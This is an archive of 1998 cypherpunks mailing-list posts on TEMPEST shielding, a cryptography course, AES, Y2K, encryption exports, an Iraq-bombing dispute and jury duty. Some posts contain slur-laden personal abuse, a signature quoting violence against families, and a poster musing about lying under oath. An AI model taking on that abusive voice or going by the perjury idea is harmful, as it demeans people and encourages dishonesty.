From: Tim May <tcmay@got.net>
Date: Wed, 23 Dec 1998 12:04:11 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Question about 'TEMPEST'
In-Reply-To: <36806A08.E9E3BEC1@citrus.infi.net>
Message-ID: <v03130301b2a61729f15c@[209.66.100.72]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:56 PM -0800 12/22/98, Tiny wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>I`m sorry to ask such a stupid question.  Is 'TEMPEST' an acronym, and
>if so, what
>exactly does it represent?

It was not originated as an acronym, though some have labored to find the
words to make it one, sort of. Best to treat it as not being an acronym.

It's a set of specs and testing methods for measuring and controlling RF
emissions by computers and other electronic equipment. Shielding with metal
enclosures, with filters on inputs and outputs, and so on.

The full TEMPEST specs are more or less classified, as might be expected.
(Because one does not lightly tell one's enemies what one is measuring for.)

Contrary to popular rumor, it is not "illegal" to shield computers, to "use
TEMPEST methods," as it were.

--Tim May

We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Wed, 23 Dec 1998 10:58:19 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981223061138.00acf7b0@205.83.192.13>
Message-ID: <Pine.BSF.3.96.981222201446.3519B-100000@smaug2.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 23 Dec 1998, Reeza! wrote:

:Date: Wed, 23 Dec 1998 06:11:38 +1000
:From: Reeza! <howree@cable.navy.mil>
:To: Missouri FreeNet Administration <measl@mfn.org>
:Cc: Jukka E Isosaari <jei@zor.hut.fi>, Joel O'Connor <ogrenivek@yahoo.com>,
:    mib <mib@io.com>, cypherpunks@toad.com
:Subject: Re: I must admit. . .
:
:At 02:29 PM 12/22/98 -0600, Missouri FreeNet Administration wrote:
:>
:>On Tue, 22 Dec 1998, Reeza! blathered thusly:
:
:Cute.
:
:>Hrmm... And we have never "sanctioned" (gotta love those innocuous
:>euphemisms) any soveriegn State?  What good for the goose is not good for
:>the gander?  I repeat, *what gives us the RIGHT* to determine his weaponry
:>or lack thereof?
:
:Perhaps if you cited a few examples, your counter-point would have some
:weight. 

How about Iraq itself???

:>:Your arguments would be better applied to Somalia and Bosnia than they are
:>:to Iraq. Our presence in those countries was of a slightly different
:>:character than it is in Iraq now isn't it???
:>Yes indeed.  In these two countries we were there only to watch over the
:>slaughter, not to perpetuate it ourselves.  Mustv'e ruined your Military
:>Day (tm), huh Reeza?
:
:(yawn) not really. Actually, any involvement we have with the UN gets on my
:nerves. Interesting, the way you ignore the differences between "internal
:conflict" and "aggression against a sovereign neighbor".

I don't see any difference when *we* are the ones injecting ourselves into
it.  Why don't you point them out to me?

Yours,

J.A. Terranson
A *thinking* citizen of the United States Of America - damn few of us
left... 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Dec 1998 10:37:02 +0800
To: cypherpunks@cyberpass.net
Subject: Advanced Crypto Graduate Course
Message-ID: <v04020a0eb2a6022dc81f@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Tue, 22 Dec 1998 20:00:31 -0500 (EST)
From: Christof Paar <christof@ece.WPI.EDU>
To: "WPI.Crypto.Seminar":;
cc: DCSB <dcsb@ai.mit.edu>
Subject: Advanced Crypto Graduate Course
Sender: bounce-dcsb@ai.mit.edu
Reply-To: Christof Paar <christof@ece.WPI.EDU>

Please find below an announcement for the Crypto II graduate course. I'll
be happy to answer any question about the course contents. For
registration questions, please contact WPI's Graduate Admission Office at
"gao@wpi.edu".

Regards,

Christof

***********************************************************************
                 Christof Paar,  Assistant Professor
          Cryptography and Information Security (CRIS) Group
      ECE Dept., WPI, 100 Institute Rd., Worcester, MA 01609, USA
fon: (508) 831 5061    email: christof@ece.wpi.edu
fax: (508) 831 5491    www:   http://ee.wpi.edu/People/faculty/cxp.html
***********************************************************************

>>>  WORKSHOP ON CRYPTOGRAPHIC HARDWARE AND EMBEDDED SYSTEMS (CHES) <<<
>>>                   WPI, August 12 & 13, 1999                     <<<
>>>         check  http://ece.wpi.edu/Research/crypt/ches           <<<


------------------------------------------------------------------------
           EE 579R, ADVANCED TOPICS IN CRYPTOGRAPHY

                       Spring `99 Semester
               WPI, Thursdays, 5:30-8:30pm, AK219
                 First day of class: January 21


                       COURSE DESCRIPTION

The course is a continuation of EE 578/CS 578, Cryptography and Data
Security. It will provide a deeper insight into several areas of cryptology
which are of great practical and theoretical importance. One focus of the
course is on techniques for efficient software and (to a somewhat lesser
extend) hardware implementations for public-key algorithms. The second focus
is on attacks against public-key schemes, which is fundamental for an
in-depth understanding of the choice of practical algorithms. Many techniques
will be introduced which are usually only treated in the research
literature.


                           SYLLABUS

Week 1: Introduction
Overview on practical public-key algorithms and efficient implementation
techniques. Efficient implementation of RSA: The Chinese Remainder Theorem.

Week 2: Selected public-key algorithms
Review of the generalized discrete logarithm problem and elliptic curve
cryptosystems.

Week 3: Efficient Implementation
Introduction to long number arithmetic.

Week 4: Efficient Implementation
Fast modular reduction algorithms.

Week 5: Efficient Implementation
Fast inversion algorithms.

Week 6: Efficient Implementation
Efficient exponentiation algorithms.

Week 7
Midterm Exam

Week 8: Attacks
Attacking DL systems: Baby-step giant-step method and Pollard's rho
method.

Week 9: Attacks
Attacking DL systems: Parallelization of Pollard's rho method.

Week 10
Topics TBA, depending on student interest. Possibilities are: Index-calculus
attack, differential cryptanalysis, correlation attacks, modern block cipher
design, Galois field arithmetic.

Week 11
as week 10 lecture

Week 12: Student presentations

Week 13: Student presentations

Week 14
Final Exam.


                           TEXTBOOKS

A. Menezes, P. van Oorschot, S. Vanstone: Handbook of Applied Cryptography. CRC
Press. (primary, mandatory)

D. Stinson, Cryptography: Theory and Practice. CRC Press, 1995. (recommended)



                        PREREQUISITES

The knowledge of the material of  EE 578/CS 578, Cryptography and Data
Security, is assumed (in particular with respect to public-key algorithms).
In addition, some experience with the C programming language is required.



***********************************************************************
                 Christof Paar,  Assistant Professor
          Cryptography and Information Security (CRIS) Group
      ECE Dept., WPI, 100 Institute Rd., Worcester, MA 01609, USA
fon: (508) 831 5061    email: christof@ece.wpi.edu
fax: (508) 831 5491    www:   http://ee.wpi.edu/People/faculty/cxp.html
***********************************************************************

>>>  WORKSHOP ON CRYPTOGRAPHIC HARDWARE AND EMBEDDED SYSTEMS (CHES) <<<
>>>                   WPI, August 12 & 13, 1999                     <<<
>>>         check  http://ece.wpi.edu/Research/crypt/ches           <<<




For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tiny <hermit@citrus.infi.net>
Date: Wed, 23 Dec 1998 11:25:02 +0800
To: cypherpunks@toad.com
Subject: Question about 'TEMPEST'
Message-ID: <36806A08.E9E3BEC1@citrus.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I`m sorry to ask such a stupid question.  Is 'TEMPEST' an acronym, and
if so, what
exactly does it represent?

Thank you,

T
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

iQA/AwUBNoBpaEiyQsorYRwzEQJFcgCghbCaE79bC5GeMtImqlmHmbs+aBUAnRZf
ybJguQDd6XMo7g3YeBhTkCNB
=RN0b
-----END PGP SIGNATURE-----

--
Erik P. Sonnwald <hermit@citrus.infi.net>
Public key available via public keyservers.
Fingerprint: 6205 7AF1 1874 6CA5 F705  6C40 48B2 42CA 2B61 1C33





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jim finder" <jim_finder@hotmail.com>
Date: Wed, 23 Dec 1998 13:07:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Good archive of AES algorithms?
Message-ID: <19981223044817.18194.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to everyone who responded to me on the AES
archive. Most people pointed me to the counterpane.com
web site, which is very nice and well done, and answers
most of my questions. Unfortunately, though, Counterpane
itself is one of the candidates, so the site may not
exactly be unbiased. Is there any site with a similar scope
being run by a disinterested party?

Thanks again!

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 22 Dec 1998 23:00:34 +0800
To: Missouri FreeNet Administration <measl@mfn.org>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981221234722.009bd210@205.83.192.13>
Message-ID: <3.0.5.32.19981222230204.03b51100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 12:41 PM 12/21/98 -0600, Missouri FreeNet Administration wrote:
>
>
>*WHY* is it any of our business whether he owns weapons of *any* kind?  WE
>own them, and we USE them: Does this give other nations the right to
>embargo us, and to bomb us into oblivion if we refuse to allow THEM to
>tell US what to do?
>
>Our concern for his weaponry should only be an issue *IF* he uses them, as
>with *OUR* weaponry.  Yours is the classical anti-gun argument, and it's
>no more effective at the international level than at the state level.

This would be a valid argument, if he had not already sanctioned Kuwait.
OOPS. Did you forget that?

Your arguments would be better applied to Somalia and Bosnia than they are
to Iraq. Our presence in those countries was of a slightly different
character than it is in Iraq now isn't it???

Hmmm???

>:Reeza!
>:DH Key available on request
>Note that your DH Key is a "munition"...  Shouldn't you be "qualified" to
>have it by the USG - strictly for the safety of the world, of course...
>
>Yours, 
>J.A. Terranson
>sysadmin@mfn.org

well J.A., my DH Key is just as much a "munition" as my house key, legal
definitions not-withstanding.
============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 22 Dec 1998 23:16:15 +0800
To: Jukka E Isosaari <jei@zor.hut.fi>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981221234722.009bd210@205.83.192.13>
Message-ID: <3.0.5.32.19981222233351.03b44550@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/enriched

 At 06:05 AM 12/22/98 +0200, Jukka E Isosaari wrote:
>On Mon, 21 Dec 1998, Reeza! wrote:
>
>> Perfectly acceptable to me personally. Please show how it will result in
>> proving that Iraq does not, and will not in the near or forseeable future
>> possess weapons of mass destruction that may be utilized against
>> neighbors, foreign or domestic. Or how it will result in turning the
>> public opinion, iraqi and/or american, touted by the biased US press in
>> such a fashion that it would result in a munificent display of openness,
>> agreeablility, and welcoming to the UN inspectors by the iraqi hosts. Or
>> show how Hussein is now trustworthy, and thereby qualified by the  MIB
>> office of the USG to possess said weapons.
>
>It won't. But please show how bombing the shit out of all the Iraqis will
>accomplish this either? I would imagine getting rid of the lunatic leader
>and establishing a civilized democracy with human rights in place, would
>result in a state that would not be as prone to be as aggressive or
>inclined to use weapons of mass destruction. Or isn't that the  ultimate
>goal?

Ostensibly, the reason for bombing Iraq is to remove their ability to engage in hostilities. We all know how that is supposed to work

>But you are right, I must admit, that not *all* democracies are
>non-aggressive, with USA coming to mind as an example. It seems that
>rotten people with no moral values at the top, result in aggressive
>foreign policies, no matter what the nation.
>
>The bombing will only result in creating more frustrated individuals with
>personal vendettas against the US. (People with dead children/wives, etc.)
>
>With your logic, the US is on a road to kill every non-american on  this
>planet, in order to ensure their own safety. 

I'm not so sure- we did not engage in hostilities against Iraq until AFTER they invaded Kuwait. We did cease and desist when requested by other middle east sovereignties who were members of the UN coalition. 

>Actually, this has been evident quite some time in the US foreign policy: 
>The *only* lives that matter are the American ones. It is also very evident
>in the US film industry (national propaganda/brainwashing machine). Just
>how many war movies have you seen where the US special-forces squads
>venture into the vietnam/arabs and kill hundreds or thousands of people in
>order to save a few US prisoners? Try thinking that in reverse, an  Arab
>squad coming into the US, and killing hundreds of US citizens to save a few
>arabs, for a change. Seeing a few movies like that would do some good to a
>lot of americans in restoring their respect for universal human life. 
>
>Anyway, the point I am trying to make in this, is that the americans don't
>in general seem to put any value on human life, *unless* it is an american.
>This is evident everywhere: in their film industry, their foreign politics,
>and even Bill Gates' donation policies. It seems to be a fact ever  more
>blatant. 
>
>Anyone else notice this?

You shouldn't base your life lessons on what appears on the boob tube. I'll be the first to agree the US media is wholly engaged in propaganda, that Hollywood uses films to convey political messages. Their success is dependant on a couple of factors, among them being whether the viewer is a person capable of rational thought, or a sheeple.

>> >The military is engaged
>> >in creating a threat to justify their existence and continued 
>>
>> EAT MY MILITARY FUCKING SHORTS YOU PUSSY FUCKWAD FAGGOT SON-OF-A-BITCH.
>> The powers of the military are being abused by CIVILIANS who cannot
>> fathom the true purpose of the military, think the military doesn't earn
>> its pay. I have something for YOU to earn, you ewe you.
>> 
>> >economic well-being. Saddam is worth much, much more to them when
>> >he is alive and well in Iraq.
>> 
>> OH YEAH, OH YEAH, THAT is why we dropped leaflets advocating the iraqis
>> do everything in their power to maintain their present, totalitarian
>> regime. GET A FUCKING CLUE YOU GREASY STAIN ON THIS MAILING LIST.
>
>Did I hit a nerve or something?

Yes. Something.

>Usually people resort to name-calling only when feeling badly inferior
>or in lack of any real facts to represent in defence of their case,
>and in general this justifies the strong doubt that the person in
>question is in fact a juvenile.

Or to give greater emphasis to what is being said. The squeaky wheel gets the grease, sound bites don't work on a mailing list.

>I'm sorry, but I won't waste my time on blathering kids like you. 
>
>(Please note: I've Cc:ed the root at your site, as you appear to be so
>childish, and I wouldn't know what a child is doing with a .mil account,
>so you must be using your parent's account or a hacked account,
>both of which are in general very much against the rules..

This should be interesting.

>Or, in the unlikely case that you are actually an adult, please consider
>this as an exemplary sample of Mr Zeebra's skills in delivering verbal
>attacks in defence of his country. Surely you recognize his superiors
>language skills and the qualifications he has for the assignation to the
>national ultra secret verbal cyber-warfare attack squad, designed to
>destroy the egos and PCs of all those who have not bought in to the US
>military propaganda.)
>
>In any case, I realize this is the wrong list for this discussion. 
>Please continue in private, like a good netbaby, if you feel like
>more name-calling. I've already added you to my filters.

and with a sniff and hoisting of the nose, you would step away, without defending the earlier position, only criticizing mine. You poor excuse for a respondee, put on your blinders, install your filters, stick your head into that hole in the sand.

Attn; root@cable.navy.mil- Hi!

Reeza!
============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


"Yeah, they mostly rely on something below the belt."

-- my older sister



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@idsi.net
Date: Wed, 23 Dec 1998 13:28:11 +0800
To: Tiny <hermit@citrus.infi.net>
Subject: Re: Question about 'TEMPEST'
In-Reply-To: <36806A08.E9E3BEC1@citrus.infi.net>
Message-ID: <Pine.LNX.3.96.981223003628.24980B-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 22 Dec 1998, Tiny wrote:

> I`m sorry to ask such a stupid question.  Is 'TEMPEST' an acronym, and
> if so, what
> exactly does it represent?

Some have turned it into an acronyms.

Originally it was just a code-word referring to emanations security. 

See http://www.eskimo.com/~joelm/tempest.html

Of interest:

"..the isle is full of noises, sounds and sweet airs that give 
delight and hurt not. Sometimes a thousand twangling instruments
will hum about mine ears, and sometimes voices.."

>From Shakespeare's "The Tempest" .. the benefits of a liberal education.

Michael J. Graffam (mgraffam@idsi.net)
"Let your life be a counter-friction to stop the machine."
			Henry David Thoreau "Civil Disobedience"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 23 Dec 1998 22:17:55 +0800
To: tcmay@got.net>
Subject: RE: Question about 'TEMPEST'
Message-ID: <896C7C3540C3D111AB9F00805FA78CE20313FB44@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> The full TEMPEST specs are more or less classified, as might 
> be expected. (Because one does not lightly tell one's enemies
>  what one is measuring for.)

> Contrary to popular rumor, it is not "illegal" to shield
>  computers, to "use TEMPEST methods," as it were.

Rather hard to see how it could be, given that the details are supposed to
be secret!  If all of a sudden you got arrested for wrapping wet towels
around screens that would be a Big Clue....

(of course that assumes you live in a country where you get told what you;ve
been arrested for. Hmmmm....)

Ken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 23 Dec 1998 13:32:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812230509.GAA11006@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



"kryz" <chrisharwig@hetnet.nl> crapped:
>
> Content-Type: application/octet-stream; name="YEAR.EXE"
>

*STOP* sending such *RATSHIT* to this mailing list
you unforgivable dickheaded *SACK OF SHIT*
Keep your fucking .EXE files to yourself.
*SMASH YOURSELF* on the head with your nice little
m$-windoze manuals. At least that would knock you
unconscious and you won't be bothering us with
your *BLATHERING CRAP*. *WE DO NOT WANT WINDOZE CRAP* on this list, you *RABIDDOGWHOREMONGER* can you get that through that *FUCKIN THICK* skull of yours?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 23 Dec 1998 06:03:40 +0800
To: Missouri FreeNet Administration <measl@mfn.org>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981222230204.03b51100@205.83.192.13>
Message-ID: <3.0.5.32.19981223061138.00acf7b0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 02:29 PM 12/22/98 -0600, Missouri FreeNet Administration wrote:
>
>On Tue, 22 Dec 1998, Reeza! blathered thusly:

Cute.

>Hrmm... And we have never "sanctioned" (gotta love those innocuous
>euphemisms) any soveriegn State?  What good for the goose is not good for
>the gander?  I repeat, *what gives us the RIGHT* to determine his weaponry
>or lack thereof?

Perhaps if you cited a few examples, your counter-point would have some
weight. 

>:Your arguments would be better applied to Somalia and Bosnia than they are
>:to Iraq. Our presence in those countries was of a slightly different
>:character than it is in Iraq now isn't it???
>Yes indeed.  In these two countries we were there only to watch over the
>slaughter, not to perpetuate it ourselves.  Mustv'e ruined your Military
>Day (tm), huh Reeza?

(yawn) not really. Actually, any involvement we have with the UN gets on my
nerves. Interesting, the way you ignore the differences between "internal
conflict" and "aggression against a sovereign neighbor".

>:well J.A., my DH Key is just as much a "munition" as my house key, legal
>:definitions not-withstanding.
>
>I see the law means much to you.  This why you joined the military? Or is
>it that they wouldn't take you over at James Bond School?

There is Law, then there is law. Much has been said about both on this list. 
I think you are chastizing me for criticizing a Bad Law. Since I haven't
broken any Laws by offering to send my public key to anyone who requests
it, I wonder why you even bring it up. 

>:The affairs of Men rarely rely on the dictates of logic, or even common
sense.
>:
>:
>:	"Yeah, they mostly rely on something below the belt."
>:
>:				-- my older sister
>
>She must've heard your "Eat my military shorts" comment...

I'll tell her you said that,,, I bet she laughs at you too. ;)

Reeza!
============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 23 Dec 1998 22:27:06 +0800
To: cypherpunks@Algebra.COM
Subject: Jury Duty
Message-ID: <199812230730.IAA17418@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



In 22 years of being qualified, I am facing my first jury duty summons as a regular employee and see no way out except to report. The old self-employment, financial burden exemption no longer applies.

Is there a good web site where I can find other legal means to recuse myself (I live in AZ), or if I do
decide to report and get on a trial, a web site on my rights to vote my conscious, aka jury nullification?

The other option is to just lie, it says the penalty is that of perjury and it seems we shall
soon have case law that perjury is no longer a crime.

Not a facetious post, I have seen posts here on this before, but never really paid attention because it didn't affect me. 

If no answers, I will resort to a search engine. But I thought this letter would get me better
quality advice.

Thanks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Dec 1998 22:45:52 +0800
To: dbs@philodox.com>
Subject: Context Magazine interviews with Moore, Metcalfe, and Coase
Message-ID: <v04020a14b2a69bffef40@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Well, I don't know about *heroes*. I mean, Tom Swift, or the Grey Lensman,
were *heroes*, right? ;-).

Still these are some good interviews, in complete keeping with the topic of
my last pico-rant.

Metcalfe talks about micromoney, even what looks, facially, like a
georecursive market. Sans digital bearer transaction settlement, of course,
but they'll all learn... :-).

Also note where Coase guess that transaction costs (not just settlement and
clearing, but the whole information enchelada of finding products, etc.)
might come to 45% of GDP, or $4.5 trillion for the US alone.

Stuff like that is why I say that digital bearer transactions will be the
dominant value transfer technology of the coming geodesic economy.

Cheers,
RAH

--- begin forwarded text


From: Somebody
To: Bob Hettinga <rah@shipwright.com>
Date: Wed, 23 Dec 1998 02:11:14 "GMT"
Subject:  Somebody has recommended a CONTEXT Magazine article to you

Somebody sent you this article from CONTEXT Magazine
(http://www.contextmag.com)

Note:
-----------------------------
A short interview with three of your heroes.  Merry Christmas!

<Somebody's .sig>
-----------------------------

http://www.contextmag.com/archives/199809/lawAndDisorder.asp
We hope you enjoy it.
CONTEXT Magazine

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 23 Dec 1998 23:08:32 +0800
To: Jan Dobrucki <cypherpunks@cyberpass.net
Subject: Re: Polish Telecommunications
In-Reply-To: <3680ED67.4603C835@qmail.pjwstk.waw.pl>
Message-ID: <199812231428.GAA03593@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Jan,

Last week I did a USIA (think Voice of America) video broadcast to Poland,
and delivered a speech to Polish journalists about Y2K. The consensus among
them and the US embassy staffers who facilitated the discussion was that
bigger companies might be okay and smaller ones wouldn't. But since (the
journalists told me) the Polish people are used to hardship, it wouldn't be
as big of a deal as it would be in the US.

Best,

Declan
Washington, DC


At 02:17 PM 12-23-98 +0100, Jan Dobrucki wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Polish Telecommunications [Telekomunikacja Polska, TP S.A..]
>
>I went to Polish Telecommunications on the 21/12/1998 
>[na ul. Zamenhoffa w Warszawie - on Zamenhoff St. in Warsaw] 
>and inquired what was being done about the Millennium Bug. 
>What I got from a medium important chief was that there was an 
>article not long ago about it, the name of the journal escapes me. 
>She seemed pretty angry that I even asked about it. What made 
>me angry was that she didn't know what was the bloody problem. 
>Total ignorance. But I guess Polish Telecommunications are 
>going to get a kick out it when the year 2000 finally does arrive.
>
>Later,
>Jan Dobrucki a.k.a. jdo
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP Cyber-Knights Templar build 5.5.3ckt
>Comment: "Information is Ammunition"
>Comment: KeyID: 0x49281659
>Comment: Fingerprint: F220 3529 2B65 FA9C  F4DF 5F02 11ED D8BB
>
>iQEVAwUBNn+aCGiR2plJKBZZAQH3twf7BohEfDHGV+mpMILXcY9xGg3E7ZQJrYIz
>rLqVDFXwBjmxu+dyGetY05fsUSZRM/uWLpUcyY8rnIoQ/EngXfycrQ8iIHrUVQxD
>Jtbfd7JDV1h3XzM0s90LINTvVlCtHCcWTpjzqsOpkMKHiA9NjdpWO+lKphgekHAH
>gB15//qPDdtjOv9f4uzs1wonaGWU+sco8EZozGgO3NDZ3qW/rUtl+TmnmvnLXpFi
>xPgaZnozQajAO/Bls7SH7oT9BJSEV4+JMUQmNRi61BolOvFE1Io2MUpBjHuCOCii
>bHIX+9r3yAfJv+LmVgV61dSIWZIi3npo2yMD72nFtQFTwDrB+cLjTg==
>=7cUG
>-----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 24 Dec 1998 00:25:43 +0800
To: mgraffam@idsi.net
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <Pine.LNX.3.96.981223003628.24980B-100000@albert>
Message-ID: <199812231539.JAA30225@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Just curious, if a computer is connected to the electric power through a UPS,
does that reduce emissions leaked into the electrical system?:wq




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Thu, 24 Dec 1998 20:22:33 +0800
To: Missouri FreeNet Administration <cypherpunks@toad.com
Subject: Re: Graffitti or National Policy?
In-Reply-To: <Pine.BSF.3.96.981222141335.2824T-100000@greeves.mfn.org>
Message-ID: <3.0.5.32.19981223094009.00ad2c20@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 02:15 PM 12/22/98 -0600, Missouri FreeNet Administration wrote:
>
>	HEY, REEZA!  ARE YOU *LISTENING* ???
>-----
> Pentagon Decries U.S. Bomb Graffiti 
>Tuesday, December 22, 1998; 1:24 a.m. EST

Looks to me like someone is a sore luser.

--snipped a bunch of twice posted material, along with running commentary--

>J.A. Terranson
>sysadmin@mfn.org

Next time, try saying something about my mother.

Reeza!


============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b!X <bix@geekforce.org>
Date: Thu, 24 Dec 1998 02:20:14 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Jury Duty
In-Reply-To: <199812231541.HAA17483@smtp.well.com>
Message-ID: <Pine.LNX.3.93.981223094053.23934B-100000@millennium-cafe.com>
MIME-Version: 1.0
Content-Type: text/plain



Also, the civilliberty.miningco.com website has a collection of jury
nullification resources.


- b!X (Guerrilla Techno-fetishist)
      (Global Effort to Eradicate Know-nothings)
      (We all suck, and that makes us strong.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 24 Dec 1998 02:15:33 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury Duty
In-Reply-To: <199812230730.IAA17418@replay.com>
Message-ID: <v03130302b2a6dc96bd3b@[209.66.100.72]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:45 AM -0800 12/23/98, Declan McCullagh wrote:
>If you want to vote your conscience (if it's a drug prosecution and you
>don't agree with drug laws for instance), there are a few organizations
>that you might want to look at. Maybe check out http://www.cato.org/ which
>last I checked had an advertisement for a new book on jury nullification
>etc. on their home page.

Simply vote "not guilty" on the charges (any or all) that one thinks are
bad charges.

Jurors are not required to "explain" their votes to anyone, least of all
the government.

Though, as with speaking to cops, it may be that the more one talks in the
jury room, or attempts to explain to the judge, the worse a hole one digs
for oneself. In particular, I'd steer clear of reading books about jury
nullification, lest one be tempted to cite case law...and thus open the
door for the judge to inquire further.

Simply voting "not guilty" gives them no grounds for contempt charges, or
whatever they usually throw at jury nullification advocates.

--Tim May

We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 24 Dec 1998 00:04:57 +0800
To: Monica Lewinsky Fan Club <cypherpunks@toad.com>
Subject: "U.S. Allows Export Of Crypto Product ... strong-encryption productto 42 countries, without government-backed key-recovery"
Message-ID: <Pine.SOL.4.05.9812231025150.18806-100000@ultra1-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


http://www.techweb.com/wire/story/TWB19981222S0016

U.S. Allows Export Of Crypto Product
(12/22/98, 5:38 p.m. ET)
George Leopold, EE Times, http://www.eetimes.com


Network security specialists ODS  Networks has won government 
approval to export its strong-encryption product to companies in 42 
countries, without a  government-backed key-recovery feature.

ODS, in Richardson, Texas, said it is the first U.S. company to 
receive a blanket export license from the Department of Commerce to 
ship its encryption product.  The government strictly controls the 
export of encryption products with a key-recovery feature and key 
lengths of 112, 128, or 1,024 bits. 

The ODS products use an alternate "stream recovery" feature that 
lets users protect encrypted data. The company said its 
stream-recovery scheme helps resolve conflicting requirements for 
privacy and monitoring. 

ODS said its objective was to introduce a monitoring capability that 
protects the rights of innocent third parties in criminal 
investigations.

- -----

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
